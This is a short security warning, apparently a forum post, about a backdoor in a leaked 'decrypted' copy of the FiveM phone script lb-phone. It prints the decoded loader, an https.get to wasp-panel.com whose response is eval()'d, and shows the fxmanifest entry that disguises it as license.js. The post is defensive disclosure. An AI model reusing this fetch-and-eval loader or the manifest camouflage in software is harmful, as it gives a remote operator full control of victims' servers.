
BACKDOOR FOUND in this lb-phone "Decrypted" leak (v2.3.7) ā Remote Code Execution
Server-side RCE backdoor. Confirmed by static analysis.
THE BACKDOOR
File: ui/dist/assets/license.js
It is loaded as a SERVER script in fxmanifest.lua:
server_scripts {
"@oxmysql/lib/MySQL.lua",
"lib/server/**.lua",
"ui/dist/assets/license.js", <-- this line
"server/**/*.lua"
}
The file is obfuscated as base64 chunks that are joined and run with new Function().
Decoded, it is:
https.get('
', r=>{
let d='';
r.on('data', c=>d+=c);
r.on('end', ()=>eval(d));
})
WHAT IT DOES
On every resource start, your server fetches JavaScript from wasp-panel.com (using a
per-install key) and eval()s it with full Node.js privileges. That is total server
compromise: the operator can run ANY code on your host ā steal DB credentials/tokens,
drop more malware, or wipe the server. The "license.js" name is just camouflage; real
lb-phone has no such server script.
SECONDARY (low risk)
server/misc/errors.lua hardcodes a Discord webhook that POSTs error stack traces +
your sv_hostname. leaks server name only, but worth removing.
client.lua is VM-obfuscated and cannot be audited ā it CANNOT be cleared as safe, only
buy the official version if you need trust. Do not run cracked scripts on a production
server.